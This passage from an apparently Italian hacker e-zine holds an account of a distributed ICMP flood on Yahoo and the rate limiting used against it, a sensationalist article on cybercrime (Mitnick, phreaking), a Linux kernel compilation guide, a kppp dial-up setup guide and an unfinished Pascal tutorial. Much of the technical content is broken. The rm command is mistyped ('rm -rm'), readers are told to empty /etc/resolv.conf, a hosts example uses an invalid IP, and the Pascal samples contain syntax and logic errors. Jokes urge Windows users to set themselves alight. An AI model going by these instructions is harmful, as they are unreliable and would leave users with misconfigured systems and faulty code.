piuttosto difficile capire cosa stesse succedendo, poiche', in un primo
momento, abbiamo notato soltanto un grosso traffico di pacchetti ICMP.
"IT TOOK US AND OUR ISP SOMETIME TO STABILIZE THE THINGS":
fondamentalmente il temporaneo filtraggio di tutti i pacchetti ICMP
- eravamo, quindi, in grado di incollare tutti i pezzi del mosaio...

Riportare le cose alla normalita', pero', ha causato maggiori problemi,
in quanto il normale traffico represso ha cominciato a sommergere il
sistema. Le cose, alla fine, si sono stabilizzate ma, in quei momenti,
non e' stato chiaro come questo avvenne. La cosa certa era che
l'attacco si era concluso. Il nostro ISP era riuscito a registrare
soltanto alcuni pacchetti. Riusci' a registrare che una significativa
percentuale dei loro stessi circuiti aveva preso parte all'attacco.
Quindi che questo era stato ampiamente distribuito.

Gli attacchi seguenti hanno avuto scarso successo, non soltanto perche'
eravamo naturalmente piu' preparati e sapevamo cosa aspettarci, ma,
soprattutto, perche' avevamo adottato delle contro-misure specifiche
per limitarne i danni.

Attualmente il nostro ISP sta utilizzando il CAR (Committed Access Rate)
per limitare la velocita' di traffico dei pacchetti ICMP in vari punti
interni al loro network. La cosa da tenere ben presente, pero', e' che
utilizzare il CAR o filtrare i pacchetti echo request / echo reply,
potrebbe non essere sufficiente.

Probabilmente, questi tipi di ICMP possono, durante un attacco, anche
sostituire i pacchetti echo:

router advertisement information request
router solicitation information reply

timestamp request address mask request
timestamp reply address mask reply

finche' un attacker(s) non riuscira' a generare questi pacchetti
con un largo payload (e' solo una mia supposizione, dato che non ho
avuto il tempo di verificare i dettagli specifici del protocollo ICMP),
questi pacchetti possono entrare con la stessa velocita' dei pacchetti
echo.

Questi "rate limiters" hanno svolto egregiamente il loro lavoro
durante gli attacchi seguenti. Il piu' recente si e' risolto con soli
150 M bits/sec giunti direttamente al sito di Yahoo. Durante questo
attacco, il nostro ISP e' riuscito a loggare completamente alcuni
di questi pacchetti. Si e' saputo che molti di questi pacchetti ICMP
erano destinati ai server di www.yahoo.com come pure ai nostri
nameserver. In poche parole, i server "ben noti" sono stati l'epicentro
di questo attacco.

Voglio dire due parole anche sulla faccenda del "NO IP DIRECT-BROADCAST".
Questo non sara' di nessun aiuto contro i DDoS. Il punto centrale dei
DDoS e' quello di cercare di prendere delle contromisure. Se vi trovate,
per esempio, con 2000 o piu' hosts e volete essere sicuri di non poter
essere un sito amplificatore, dovrete sfruttare il "NO IP DIRECT-
BROADCAST"
... bene... se riesco ad avere accesso ad uno dei 2000 o piu'
hosts, potro' comunque "pingare" dall'interno del network.

infatti, da una delle tracce che abbiamo, questo e' proprio quello che
sembra essere successo. L'IP destinatario era 255.255.255.255 e la
sorgente eravamo noi.

L'attacco era diretto ai nostri routers ("SPOOFED SRC IP WAS THAT OF OUR
ROUTER INTERFACE"
). Sembra, quindi, che l'attacker(s) conoscesse bene
la nostra topologia e che abbia pianificato in anticipo questo attacco
su larga scala. Anche parlando con le altre compagnie, sembra che anche
loro siano state colpite nel punto di maggior danno.

Sicuramente, quindi, ci troviamo di fronte ad un DDoS, con un
attacker(s) abbastanza sveglio e, comunque, con capacita' al di sopra
di un comune "script kiddie". L'attacker(s) probabilmente conosce
abbastanza bene sia Unix che il networking (Cisco ecc.) ed ha studiato
la topologia del sito alla ricerca dei punti deboli.

Abbiamo alcune e-mails spedite da persone il cui sito e' stato
utilizzato come amplificatore. Il vostro ISP, probabilmente, ha
migliori o maggiori logs del nostro.

Se volete altre informazioni o avete domande su qualsiasi argomento
trattato in questo articolo, sentitevi liberi di mandarmi una mail a:
sciacallo@virgilio.it

---(thE JaCKal)---

-=!!!|-kRimIni 0nlIne-|!!!=-

Tratto da X-Factor
By -M4L3F1K0- [Dgt_Brains]

Istruzioni per la fabbricazione di bombe fai-da-te, droghe illegali, persino i
particolari della nostra situazione bancaria: è tutto nel computer. Il mondo
potrebbe finire alla mercè dei Cybercrimilnali?

Nelle prime ore di un mattino del febbraio 1995, gli agenti dell'FBI
circondarono un condominio di lusso di Relaigh, nel North Carolina. Quando
Kevin Mitnik, uno dei più celebri pirati informatici (hacker) d'America, uscì
dal suo appartamento, gli agenti gli misero le manette ai polsi. Finiva così
una caccia all'uomo condotta su tutto il territorio statunitense da una
squadra capitanata da Tsutomu Shimomura, esperto di sicurezza informatica, e
composta da agenti FBI, scienziati informatici e investigatori dilettanti.
L'assoluta determinazione a catturare Mitnik risaliva al dicembre 1994, quando
il "pirata" si era collegato al computer di Shimomura, gli aveva rubato
software per un milione di dollari e gli aveva lasciato alcuni messaggi vocali
con la chiara intenzione di prenderlo in giro. I due ingaggiarono una
battaglia di astuzie terminata con l'arresto di Mitnick.

=] SICUREZZA NAZIONALE [=

Kevin Mitnick era già salito agli onori della cronaca nel 1982, ancora
adolescenie, quando utilizzò un computer per accedere ai dati del Comando
della Difesa Aerea degli Stati Uniti. Al momento dell'arresto, fu trovato
inpossesso di dati riguardanti più di 20000 carte di credito oltre che di
numerosi codici di accesso reittivi alle banche più riservate di ogni parte
del mondo.

Kevin aveva acquisito il controllo degli uffici centrali delle tre compagnie
telefoniche di NewYork e di tutte le centrali di communtazione della
California. Se lo avesse voluto, avrebbe potuto accedere ai sistemi
informatici delle principali borse valori d'America o a quelli dei centri
militari di controllo. Con i capi di imputazione Mitnik rischia una condanna
fino a 100 anni di recluclusione. Un altro caso ha come protagonista Mark
Abene anche ogni parte noto col nome di "Phiber Optik".

Abene finì in prigione il 7 gennaio 1994 colpevole ddi aver preso di mira i
computer centrali delle compagnie telefoniche. Condannato a 1 anno e 1 giorno
di reclusione venne però rilasciato il 7 novembre dello stesso anno. Sebbene i
reati commessi da Abene non avessero le stesse sinistre implicazioni di
quelli perpetrati da Mitnick, entrambi i personaggi condividevano l'interesse
per i sistemi telefonici.

Come Mitnick, auche Abene aveva inventato dei sistemi per effettuare
gratuitamente chiamate internazionali intrufolandosi illegalmente nei centri
di controllo delle telecomunicazioni
Questa branca della pirateria informatica è nota col nome inglese di phreaking
e per ragioni sin troppo ovvie, non è molto ben vista dalle società che
gestiscono il traffico telefonico, come la British Telecom o l'americana AT&T.
Un altro trucchetto, questa volta un po' infantile, escogitato da Mark Allene
consisteva nel far addebitare a un telefono privato inglese il costo delle
telefonate effettuate negli Stati Uniti. In questo modo, una voce elettronica
chiedeva 10 centesimi di dollaro ogni volta che veniva sollevato il
ricevitore.

Se nel caso che abbiamo appena descritto si è trattato di una ragazzata
relativamente innocua, i criminali informatici specializzati nel settore delle
telecomunicazioni hanno acquisito la capacità di "rubare" i numeri dei
telefoni cellulari facendo poi pagare a ignari utenti il costo, quasi sempe
esorbitante, delle loro chiamate. E non solo. Riescono a reindirizzare i costi
dei loro telefoni in modo che compaiano, tanto per fare un esempio, sulla
vostra bolletta. Reati di questo tipo non vengono sottovalutati: dal 1990 a
oggi, sono costati alle compagnie telefoniche britanniche qualcosa come 400
milioni di sterline (più di 880 miliardi di lire).

=] L'HACKER IN TRAPPOLA [=

Abene non faceva affatto mistero dei suoi successi e si divertì nel raccontare
le sue prodezze a una stazione radiofonica di New York. Questa bravata lo
portò all' attenzione delle compagnie telefoniche e causò la sua rovina.
Durante il processo, un ex 'igente della CIA pensò che Abene avesse troppo
talento per sprecarlo in prigione e si offrì di sorvegliarlo durante lo
svolgimento di un lavoro a Washington in alternativa alla detenzione. Ma il
giudice respinse l'offerta e condannò Abene al massimo della pena. Sono in
molti a ritenere che le compagnie telefoniche abbiano esercitato forti
pressioni sulla corte per ottenere una condotta esemplare che scoraggiasse
altri potenziali pirati infornatici.

Mitnick e Abene sono solo la punta dell' iceberg. Con importanti società che
utilizzano i computer per mandare avanti i loro affari, la prospettiva per
il crimine informatico è a dir poco terrificante.

=] FURTO NEL CIBERSPAZIO [=

Internet è una rete di elaboratori il cui accesso è libero a tutti in ogni
parte del mondo con il solo ausilio di un computer e di una linea telefonica
commutata. Questo offre agli hacker come Mitnik e Abene nuove opportunità e
sempre più stimolanti. In Internet sono già disponibili bartking (che
permettono l'effettuazione remota di operazioni bancarie) e di vendita a
distanza. Un hacker che viaggia sulle autostrade informatiche, avrebbe la
possibilità di predare conti bancari e carte di credito. Un rapporto della
Commissione Federale del Commercio degli Stati Uniti, pubblicato nel maggio
1996, si è spinto a dichiarare che il ciberspazio è divenntato la nuova
frontiera degli artisti della truffa sulle inforimazioni confidenziali.
Secondo una recente indagine condotta dalla Management Consultancy PA, il
crimine irformatico è costato al mondo degli affari britaunico nel solo 1995
la bella cifra di 40 milioni di sterline al giorno (circa 88 miliardi Tra le
truffe cui la stampa ha dato maggior risalto in quella in cui i pirati
interferivano con le strisce magnetiche delle tessere fedeltà dei supermercati
con lo scopo di attribuire a se stessi un numero maggiore di punti.

Peter Jenner, capo della divisione internazionale di sicurezza informatica
della Management Consultancy PA, una tendenza particolarmente preoccupante è
costituita dal sempre maggiore coinvolgimento nel campo delle truffe
informatiche di criminali organizzati e ben equipaggiati.

=] DENARO FACILE [=

Le organizzazioni criminali hanno bisogno di soldi per supportare le loro
attività loro attività e la truffa informatica costituisce un sistema
relativamente poco rischioso di rastrellare grosse somme di denaro. Si
costringe l'impiegato di una società a manomettere il sistema informatico e a
dirottare il denaro in un conto bancario falso oppure ci si infiltra
direttamente, facendosi assumere nella società che si vuole depredare. "I
colpevoli di questo tipo di reati vengono catturati molto raramente"
,
avverte Jenner, perché risulta estremamente difficile rintracciare, e non
parliamo poi di perseguire, la persona che ha commesso il reato.

Fortunatamente, però, non finisce sempre così. Nell'ottobre '99 venne
portato alla ribalta uno degli esempi più audaci di reato informatico, per il
quale furono arrestate ben sette persone.
Con un sistema relativamente semplice e la complicità di alcuni impiegati
corrotti della British Telecom, la cosiddetta "banda del buco" aveva
progettato di inserirsi nelle linee telefoniche che collegano i baticomat ai
computer centrali delle banche: in questo modo avrebbe potuto conoscere
centinaia di migliaia di codici segreti, cioè quella sequenza di quattro,
cinque numeri che deve essere digitata sulla macchina perché questa possa
erogare il danaro. Una volta decifrati, questi codici sarebbero stati inseriti
in una nuova tessera.
La polizia disse che se il furto avesse avuto successo, avrebbe rovinato le
istituzioni finanziarie della Gran Bretagna.

=] INFORMAZIONI IN LIBERTA' [=

Fino a questo momento, il crimine informatico sembra nguardare solo il mondo
dei grandi affari. Ma a Internet si collega un numero sempre crescente di
persone, e questo tipo di reato potrebbe finire per interessare da vicino
ognuno di noi.

Internet è ugnì sorta di "piazza" virtuale dove qualsiasi tipo di informazione,
legale o no, diventa di pubblico dominio.
Accanto agli innegabili vantaggi, che non sono qui in discussione, possono
esservi anche dei rischi connessi al reperimento di centinaia di migliaia di
dati e informazioni che, nelle mani sbagliate, costituirebbero una minaccia
per l'umanità.
Per fare qualche esempio, è possibile reperire le istruzioni per confezionare
ordigni estiplosivi rudimentali o sofisticati (anche nucleari) o dettagli
sulle modalità per ordinare armi da fuoco; ci si può informare sul modo
migliore di suicidarsi, di realizzare il delitto perfetto, di cambiare
identità o simulare la propria morte.

L' abbondanza di informazioni illegali in Internet costituisce il terreno di
coltura ideale per potenziali criminali.
Con 10 milioni di utenti in rete, le possibilità di catturare l'elemento
criminale sono quasi nulle.

=] REGOLAMENTARE LA RETE [=

Pensiamo anche al dilagare della pornografia infantile. Nel novembre 1995,
Christopher Sharp un consulente di direzione quarantottenne sposato e padre
di due figli fu dichitrato colpevole di avei scaricato sul computer di casa
sua pornografia infantile trovata su Internet. Il suo arresto avvenne nel
corso di una grande operazione, in codice "Operazione Esplosione Stellare",
cui avevano collaborato le forze di polizia di sette paesi tra cui Stati
Uniti, Germania e Hong Kong.

Regolamentare Interne per fermare definitivamente la pornografia infantile è
un lavoro mostruosamente difficile.
Uno dei problemi principali è costituito dalle diverse legislazioni dei vari
paesi, e Internet del resto non ricade in nessuna giurisdizione. Se un paese
dichiara guerra alla pornografia infantile, i pedofili possono trasferire il
loro materiale in un'altra nazione con 1eggi più permissive. Questo
materiale può essere caricato in Internet e reso disponibile a tutti e ovunque.

Se l'abilità di hacker come Mitnik è in grado di mettere in ginocchio la
sicurezza dei sistemi informatici, sarebbe allora auspicabile un maggior
investimento di risorse umane tecnologiche in questo campo, prima che la
situazione divenga incontrollabile e finisca per distruggere anche i benefici
che possono realmente venire dalla Rete.

Tratto da X-Factor

---M4L3F1K0--- [Dgt_Brains]


###############
# -[ lInUx ]- #
###############


-=!!!|-lA cOmPiLaZiOnE dEl KeRnEl-|!!!=-

Autore: Jackal66

Allora benvenuti ragazzi (e sopratutto ragazze ;-) ) in questo articolo
parleremo di ricompilazione del kernel.

Dunque prima di incominciare vorrei chiarire una cosa; esistono 2 tipi di
kernel:

1) Kernel Modulare
2) Kernel monolitico

Nel kernel modulare vengono caricati i moduli (che possono anche essere
definiti drivers) e questi non si 'fondono' diretamente con il kernel ma
vengono compilati separatamente per cui possono essere modificate senza che il
kernel debba essere ricompilato un' ulteriore volta.
Invece nel kernel monolitico le periferiche vengono caricate nella ram e da la
non possono essere piu' toccate, per modificarle occorrera' ricompilare il
kernel.

Dove scaricarsi i sorgenti del kernel

Per prima cosa bisognera' scaricarsi i sorgenti del kernel (di regola sono in
formato tar.gz). L' ultima versione sia stabile (2.2.xx) che non stabile
(2.3.xx) la troverete sicuramente su http://www.kernel.org e di solito la
dimensione del kernel completo (non la patch) occupa sui 14 mb.

Come decomprimere i sorgenti del kernel

Collegarsi come root e copiare il sorgen

  
te compresso in /
(ad esempio cp /root/file_scaricati/linux.2.2.10 /)
e digitare da / tar xvfz /linux.x.y.zz
(dove x.y.zz dovra' essere sostituito dalla versione del kernel)
e verra' creata una nuova directory in /usr/src/linux-x.y.zz. Ora si dovra'
creare un link simbolico alla directory
/usr/src/linux.x.y.zz con il comando:
ln -sf /usr/src/linux.x.y.zz /usr/src/linux. Ora nella
directory del kernel possiamo entrarci dando il comando cd /usr/src/linux
invece che con cd /usr/src/linux.x.y.zz .

Configurazione del kernel.
Ora incominceremo la vera compilazione allora date il comando
cd /usr/src/linux
(per entrare nella directory del kernel), dopo di che possiamo scegliere il
programma con cui andremo a configurare il kernel e cioe':
1) make config
2) make menuconfig
3) make xconfig

Il primo ve lo sconsigilo in quanto e' senza interfaccia grafica e fa partire
uno script che fa una marea di domande; quindi e' molto scomodo e ve lo
consiglio solo se vi piace la sofferenza :-)

Il secondo e' con interfaccia semi grafica ed e' un po' piu' intuitivo del
primo.

Il terzo ha un interfaccia grafica e per avviarlo bisognera' tenere X gia'
aperto.

Una volta che ne avete scelto uno vi uscira' una schermata con varie opzioni
da scegliere (alcune possone essere lasciare cosi' come sono e quindi non le
citero' nemmeno):
----------------------------------NOTA----------------------------------------
Io non vi diro' quando caricare un modulo (ammeno che' non ve ne sia bisogno)
e quindi questa scelta la lascio a voi
--------------------------------FINE NOTA-------------------------------------
General Setup
Lasciate cosi' com'e', cmq controllate che sia attivato il supporto per il
networking (networking support) e PCI support.

Plug And Play Support
Qui usciranno solitamente solo due opzioni (Plug and Play support e
Auto-Probe for parallel devices) attivate Plug and Play Support e caricate
come modulo Auto-Probe.....

Block Devices
Qui potete lasciare tutto come sta'

Networking Options
Qui attivare le prime nove opzioni e quelle dopo lasciatele cosi' come sono

SCSI Support
Attiverete le varie opzioni se avete delle interfaccie scsi

SCSI low-level drivers
Se avete delle periferiche scsi e qui non sapete che mettere mettete tutto (o
quasi) come moduli

Networking Device support
Qui' lasciate tutto com'e' e accertatevi che sia attivato:
Networking device support
PLIP
PPP
SLIP

Ethernet (10 or 100 Mbit)
Attivare le varie opzioni se volete controllare la vostra rete ethernet da
linux

ISDN SubSystem Support
Se avete modem isdn attivate (io vi consiglio come modulo) ISDN support, poi
le prossime 4 opzioni e assicuratevi che sia attivata l' opzione HISAX
support for EURO/DSS1 e quindi anche HiSax SiemensChipSet driver Support e
dopo selezionare il modello del vostro modem

FileSystem
Lasciate com'e' ma attivate DOS FAT fs support, MSDOS fs Support, VFAT
(windows 95) fs support.

Sound
Attivate sound support e selezionate la vs. skeda se volete sentire i suoni
dal linux.

Ok ora premete Save and Exit.

Compilare il kernel (che palleeeee!!!!)

Ora da una shell (o da un terminale se siete in X) digitare
(ogni comandando seguito da invio ovviamente)
make dep
make clean
make bzImage
make modules
rm -rm /lib/modules/x.y.zz/* (serve per eliminare i moduli vecchi, ricordate
che x.y.zz va sostituito con la versione del kernel)
make modules_install
depmod -a
creare una copia del file /boot/vmlinuz-.x.x.xx chimandolo vmlinuz-x.x.xx-old
Ora dare il comando:
cp /usr/src/linux/arch/i386/boot/bzImage /boot/vmlinuz-x.x.xx
(dove x.x.xx va sostituito dalla vesione del kernel precedente)

Dopo di che editare lilo.conf, che conterra' pressapoco queste linee:
boot=/dev/hda
map=/boot/map
install=/boot/boot.b
prompt
timeout=50
default=linux

image=/boot/vmlinuz-2.2.12
label=linux
initrd=/boot/initrd-2.2.12-20.img
read-only
root=/dev/hdb1
other=/dev/hda1
label=dos

e aggiungerci le seguenti linee sotto a default=linux

image=/boot/vmlinuz-2.2.12
label=linux
read-only
root=/dev/hdb1

e modificate le linee:

image=/boot/vmlinuz-2.2.12 ------------->Va cambiato con
/boot/vmlinuz-2.2.12-old (o come l'abbiamo chiamato prima)
label=linux --------------------->Va cambiato in
old initrd=/boot/initrd-2.2.12-20.img
read-only
root=/dev/hdb1

Poi copiate il file System.map posizionato in /usr/src/linux
nella directory /boot chiamandolo come il vecchio:
cioe' se il vecchio System.map si chiamera' System.map-2.2.12 allora fate:
cp /usr/src/linux/System.map /boot/System.map-2.2.12
Vi consiglio di crearvi una copia nel caso qualcosa andasse storto
Ora digitate lilo e se tutto e' andato bene vi rispondera' con le righe:

Added Linux*
Added Dos
Addes Old

ora riavviate dando uno shutdown -r now e se tutto e' andato a buon fine
cancelate il kernel vecchio con il comando: rm -rf /usr/src/linux.x.x.xx
(ovviamente x.x.xx va sostituito con la vers. del kernel vecchio; mi sono
stancato di dirlo)

E' FINITAAAAAAAAAAAAAAAAAAAAA

Finalmente la compilazione del kernel e' finita io vi do un saluto
ByeZ!!
PS. Per chiunque volesse scrivermi la mia e-mail e' weesp@tin.it
PS. Scrivetemi a weesp@tin.it anche se non volete contattarmi
PS. Non mandate e-mail bomb a weesp@tin.it
PS. OK basta PS.
PS. Ciao Ciao

---Jackal66---

-=!!!|-sEtTarE iL KPPP dI LiNUx ed I sERvEr dI c0nNEsSi0nE-|!!!=-

Autore: Lord 'xYz

Rieccomi per la seconda volta a rompervi le palle, sempre io, va be dai non
sono malvagio :)))))))))
Adesso vi spiego come settare linux per essere subito online con il nostro
pinguino preferito; io penso che una persona che istalla linux per la prima
volta e non riesca a settare il kppp per connettersi alla rete e lasci linux
in disparte e utilizzi windows per navigare. Visto che internet e' di voga
oggi e soprattutto le chat io penso che lavorare online da subito con linux
sia un metodo di veloce apprendimento; ok detto questo che puo' sembrare
noioso, partiamo subito con il settaggio del kppp...

1_aprite il kppp se non lo avete procuratevelo cmq si trova nel kde e dovrebbe
essere presente in quasi tutte le distribuzioni linux. la prima schermata è
di facile dovete inserire nome utente (username) e password di connessione,
come su winzozzo

2_adesso cliccate su configurazione troverete ACCOUNTS. DISPOSITIVO, MODEM,
PPP, queste servono gli altri due lasciateli invariati. Lasciamo perdere per
un attimo ACCOUNTS lo vedremo dopo, adesso vediamo DISPOSITIVO.

3_DISPOSITIVO: il vostro modem dovrebbe trovarsi sulla com1 se non lo è
mettetelo lì :)))))))), cazzo ma non vedo scritto com1 nella
lista come faccio, la com1 in linux corrisponde alla porta
/dev/ttySO e com2 alla porta /dev/ttyS1 scelta la porta giusta
vediamo il controllo di flusso selezionamo NULLA.
Fine linea settiamo CR/LF, velocità di connessione mettiamo la
velocità del nostro modem ,selezioniamo use lock file e timeout
modem 60 secondi.

4_MODEM: attesa se linea occupata settiamo 10 secondi, volume modem mettete la
metà di volume bisogna sentirlo il modem quando parla :)))))))) .
Stop non mettete nient' altro.

5_PPP: timeout del programma pppd 30 secondi, selezionate quello che volete
del restante PPP come vi piace di più.

6_ACCOUNTS: selezioniamo nuovo. arg che cazzo ci metto adesso non ci salto
fuori, allora troverete CHIAMA..., IP. DNS . GATEWAY, gli altri
due lasciateli in disparte per il momento.

A_CHIAMA...: nome connessione mettiamo un nome che ci pare che vogliamo dare
alla nostra connessione, numero di telefono scriviamo il nomero
di telefono dato dal nostro account come su winzozzo,
autenticazione settiamo PAP, selezioniamo ricorda password, poi
il resto se lo volete mettere mettelo ma serve per comodità non
per connettersi.

B_IP: selezioniamo ip dinamico il resto lasciate invariato.

C_DNS: eccoci al punto cruciale i server dns, dove cazzo li trovo, allora se
non siete fessi spero abbiate tenuto il cd di connessione a internet
o avere stampato quello le pagina finale se avete attivato un account
sulla rete tipo : tin fuck :) ,jumpy, tiscali, libero avete capito, se
non li avete procurateveli spedite una mail o cercate dei server che
accetto di essere usati come server DNS.
Ok adesso che vi siete procurati i server dns settiamo DNS : nome
dominio mettiamo il nome del primo server dns , idirizzo IP del DNS li
dovete scrivere in cifre , quindi andate su winzozzo connettevi andate
in chat e scrivere /dns primo server DNS e /dns secondo server DNS
scrivetevi gli ip in cifre su un foglietto di carta e tornate su linux
offendendo bill gates il settaggio viene meglio ahahahhahahahaah adesso
inseriamo gli IP dei server DNS e abbiamo finito con questo punto.

D_GATEWAY: settiamo gateway predefinito se avete un gateway meglio per voi
mettetelo e selezioniamo pure assegna il "default route" a questo
gateway.

Adesso abbiamo finito possiamo ahhaahah ma credevate veramente di aver finito?
ma non scherziamo vi devo rompere ancora le palle un pò spero non abbiate
stracciato il bigliettino con i server dns con gli ip perchè adesso dobbiamo
configurare un pò di file come hai vecchi tempi del mitico amstrad :))))))))).

Dunque apriamo con un notepad o altro programma di scrittura per linux questi
seguenti file : /etc/host.conf
/etc/hosts
/etc/resolv.conf

/etc/host.conf :

order hosts,bind
multi on

lo dovete trovare scritto così se non lo è scrivelo come indicato sopra e
salvate

/etc/hosts :

#necessario per il loopback

127.0.0.1 localhost.localdomain localhost

ip del 1° server 1° server DNS scritto in lettere scrivete quello che vi
pare per dargli un nome

ip del 2° server 2° server dns scritto in lettere scrivete quello che vi
pare per dargli un nome

125.245.256.5 windows.in.the.cess.org billfuck

ne potete mettere quanti ne volete di server DNS, ricordate sempre che da un
server ad un altro di lasciare una riga, se il serve ha più indirizzi ip come
vi capiterà per il vostro server ricordate sempre che fa parte di un solo
server, é una possibiltà in più che vi da il server se trovate il primo IP di
server pieno avrete il secondo che sarà sicuramnete libero, se doveste
trovare anche quello pieno il massimo della sfiga, passerete al secondo server
che avete scritto. potevi scrivere delle informazioni per ricordavi a cosa
scrive quel file potete scrivere tutto quello che volete basta mettere
#quello che vi pare il file capirà che quello sono informazioni vostre.

/etc/resolv.conf :

questo file deve essere vuoto quindi se c' è qualcosa cancellatelo.

ho finito veramente, cazzo non so più cosa scrivere, intanto tornerò con
qualcosa di ancora più lungo hahahahahahahahahaha. Ecco potrei spiegare come
configurare tutto XCONFIGURATION , bello molto lungo e voi sarete costretti 3
a leggere a vi lascio ADIOS.

A/\/ARCHY RULEZzZz!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! by LoRD'xYz

---Lord 'xYz---

#################
#+-------------+#
#| pR0gRamMinG |#
#+-------------+#
#################

Nota di 0ldir0n61: Visto che sono prevenuti 2 articoli circa la programmazione
in PASCAL, per non fare un torto a nessuno, li pubblichiamo
entrambi...mEliUs AbUndArE qUam DeFicErE! (azz quanto sono
colto! ;-)))


-=!!!|-PaScAl TuToRiAl ][ PaRtE PrImA-|!!!=-

Autori: bugbyte & |ns4n3 [dArkSide Crew]


Indice
0 - Introduzione:"Il Fantastico Mondo Del Pascal"
1 - Basi Del Pascal
2.1 - Le Variabili E Le Costanti
2.2 - If Then Else
2.3 - I Cicli
2.4 - Le Funzioni
3 - Conclusioni


0 - Introduzione: "Il Fantastico Mondo Del Pascal"

<bugbyte> sei pronto ad entrare nel fantastico mondo del pascal?
<|ns4n3> ke kazzo ti sei fumato? ke c'entra ora questa stronzata?
<bugbyte> ok siamo pronti per cominciare!
<|ns4n3> pronti a cosa?
<bugbyte> pronti a entrare nel fantastico mondo del pascal

(colonna sonora di "2001 Odissea Nello Spazio" per dare suspence)

Alloraz per prima cosa prendete un qualsiasi compilatore di pascal.
Consiglio di utilizzare gpc (gnu pascal), che è per linuz, se usate ankora
winzozz consiglio invece di cospargersi di benzina e fumare una sigaretta.
|ns4ne invece consiglia di chiudersi dentro una gabbia piena di pitbull
affamati dopo essersi cosparsi da capo a piedi di Chapi. Se il suicidio non
rientra nei vostri progetti + immediati allora consigliamo turbo pascal.
Potrete trovare gpc a questo url:
http://agnes.dida.physik.uni-essen.de/~gnu-pascal/

2 - Basi Del Pascal

Qui sotto trovate un semplice programma per pascal che sarà spiegato piu sotto

[-- InIzIo PrOgZ --]

program semplice_programma_scritto_in_pascal; (* il nome del progz .. *)
begin (* inizio progz ... *)
writeln('Ciao Mondo!'); (* scrive sullo schermo "ciao mondo!" *)
readln
end. (* fine del progz *)

[-- FiNe PrOgZ --]

Ok, ok, cominciamo la spiegazione del programma + semplice che ci è venuto in
mente. Prima di tutto è necessario sapere che in tutti i casi, tranne
poche eccezioni, alla fine di ogni comando va il punto e virgola. Quel "program
nomedelprogramma" da il nome al tuo programma e anche se utilizzarlo è
facoltativo, è consuetudine scriverlo all'inizio del progz. Per iniziare il
programma si usa il comando "begin" che è una delle poche eccezioni in cui
NON va assolutamente il punto e virgola. Il comando "write" serve per
scrivere sullo schermo, mentre l'aggiunta di "ln" serve per andare a capo. Il
comando read serve per leggere un valore e salvarlo in una variabile, in
questo caso è stato inserito per fare in modo che il programma aspetti un
input dall'utente e non esca immediatamente. Prima dell'end non va mai il
punto e virgola. "End" serve per terminare il programma e deve avere sempre
alla fine il punto. Tutto quello che è racchiuso tra (* *) è un commento. Un
commento si puo inserire facoltativamente in quanto non è indispensabile per il
funzionamento del programma, ma se si vogliono rendere disponibili i sorgenti
del suddetto potrebbe essere utile inserirlo.

2.1 Le Variabili E Le Costanti

Una variabile, come dice il nome stesso, è un dato che puo assumere valori
diversi durante lo svolgimento del programma. Una costante invece è un
dato che può assumere un solo valore all'interno del programma.
Nel pascal si dichiara una variabile tramite il comando "var".
Esistono vari tipi di variabile, che riportiamo nella tabella sottostante
_______________________________________________________________________________
| Integer | Tipo di variabile che comprende numeri interi tra -32768 e +32767
|_________|_____________________________________________________________________
| Real | Tipo di variabile che accetta i numeri decimali
|_________|_____________________________________________________________________
| Byte | Tipo di variabile che accetta i numeri interi compresi tra 1 e 255
|_________|_____________________________________________________________________
| Longint | Tipo di variabile che accetta numeri interi compresi tra
| | -2147473648 e +2147473648
|_________|_____________________________________________________________________
| String | Tipo di variabile che accetta da 1 a 255 caratteri alfanumerici
|_________|_____________________________________________________________________
| Char | Tipo di variabile che accetta UN qualsiasi carattere ascii
|_________|_____________________________________________________________________
| Boolean | Tipo di variabile che accetta due valori: vero e falso
|_________|_____________________________________________________________________

Per dichiarare una costante invece si usa il comando "const".
Ed ora ecco un altro progz per farvi vedere come utilizzare i vostri nuovi
amici.

[-- InIzIo PrOgZ --]

program utilizzo_delle_variabili;
var topolino,paperino,pippo:integer;
(* In questo momento abbiamo dichiarato tre variabili di tipo integer *)
const eta_beta = 3;
(* Qui invece abbiamo dichiarato una costante *)
begin
topolino:=3;
(* Stiamo assegnando il valore alla variabile topolino *)
paperino:=3;
pippo:= topolino + paperino + eta_beta;
(* La variabile pippo è il risultato della somma delle precedenti variabili *)
writeln('Il risultato è',eta beta');
(* write in questo caso scriverà il valore della variabile eta beta *)
readln;
end.

[-- FiNe PrOgZ --]

Come avrete certamente notato la sintassi da seguire per il comando "var" è la
seguente: var nome_variabile1,nome_variabile2:tipo_di_variabile
Per il comando "const" la sintassi è invece: const nome_costante =
valore_della_costante
Per assegnare un valore ad una variabile si usa invece la seguente sintassi:
nome_della_variabile := valore della variabile

2.2 If Then Else

La selezione, cioè la scelta operata da determinate condizioni che avviene
durante l'esecuzione del programma, è solitamente rappresentata
dall'espressione if then else. If then else opera la selezione, verificando se
una determinata espressione è vera o falsa e eseguendo un determinato pezzo di
programma se è vera e un altro se è falsa. Se però non è presente il
comando "else", se l'espressione è falsa il programma va avanti senza tenere
conto dei comando che sarebbero stati eseguiti nel caso la condizione fosse
stata vera. Infatti il comando else serve per dire al programma che se
l'espressione è falsa deve eseguire un determinato blocco di istruzioni. Un
esempio:

[-- InIzIo PrOgZ --]

program selezione;
var paperone,paperettayeye,krusty:integer;
var paperino:string[30];
begin
clrscr;
writeln('calculator20000');
writeln('Inserisci 2 numeri');
readln(paperone,paperettayeye);
krusty:=paperone + paperettayeye;
if paperone or paperettayeye < 0 then
begin
writeln('ti ho gia detto che non voglio numeri negativi DROGATO');
writeln('Scrivi che droga usi DROGATO');
readln(paperino);
writeln('Tu usi ',paperino);
end
else
writeln('visto che non hai messo numeri negativi ti dico il risultato di
',paperone,'piu ',paperettayeye,'che è ',krusty);
readln
end.

[-- FiNe PrOgZ --]

Il programma che potete ammirare qua sopra, è sì alquanto stupido, ma è anche
il primo che ci è venuto in mente per farvi capire come opera la selezione. Il
comando "readln" serve x far leggere al programma l'input che viene dato e
lo assegna alla variabile. Come avrete notato il comando "if", che deve
necessariamente essere seguito da "then", è usato nella seguente sintassi:

If condizione then
comando;

Avrete inoltre notato che sia in questo esempio, sia nel progz, manca il punto
e virgola al comando, infatti è una delle eccezioni di cui parlavamo nel primo paragrafo.
Al "comando" seguito da if.. then il punto e virgola va invece solo in un caso: quando
c'è solo un'istruzione e non c'è il comando else. Prima del comando else non
c'è mai il punto e virgola.
Per utilizzare piu istruzioni la sintassi è la seguente:

If condizione then
begin
istruzione1
istruzione2
end;

2.3 I cicli

Arrivati a questo punto dovremmo darvi la definizione dei cicli,ma dopo un
